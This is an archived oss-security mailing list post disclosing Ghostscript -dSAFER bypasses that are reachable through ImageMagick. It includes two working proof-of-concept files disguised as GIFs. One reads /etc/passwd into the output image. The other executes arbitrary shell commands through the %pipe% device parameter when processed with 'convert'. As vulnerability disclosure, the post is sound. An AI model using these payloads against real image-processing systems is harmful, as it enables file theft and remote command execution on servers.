Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri, 30 Sep 2016 13:05:16 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: oss-security@...ts.openwall.com
Cc: Florian Weimer <fw@...eb.enyo.de>
Subject: Re: ImageMagick identify "d:" hangs

On Thu, Sep 29, 2016 at 2:28 PM, Tavis Ormandy <taviso@...gle.com> wrote:
>
> Just for future reference, here is an example of dumping a file to an
> image processed with ImageMagick that works with gs 9.20:
>
> $ cat test.gif
> %!PS
> /Size 20 def                             % font/line size
> /Line 0 def                              % current line
> /Buf 1024 string def                     % line buffer
> /Path 0 newpath def
>
> /Courier-Bold findfont Size scalefont setfont
> 1 1 1 setrgbcolor clippath fill          % draw white background
> 0 0 0 setrgbcolor                        % set black foreground
>
> (/etc/passwd) .libfile {
>     {
>         dup Buf readline
>         {
>             Path Line moveto show
>         }{
>             showpage
>             quit
>         } ifelse
>         % next line
>         /Line Line Size add def
>     } loop
> } if
> $ convert test.gif png:test.png

The more I look, the worse it gets. This also works in 9.18 and
higher, arbitrary shell command execution:

$ cat test.gif
currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)
.putdeviceparams
quit
$ convert test.gif png:test.png

(Note: I don't know why it doesn't work on earlier versions, maybe
it's possible to make it work, or some other param will work)

I think -dSAFER is too dangerous to use without sandboxing right now,
things like evince and imagemagick that use it as a backend should
disable by default.

I'm not planning to look any more at this.

Tavis.

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ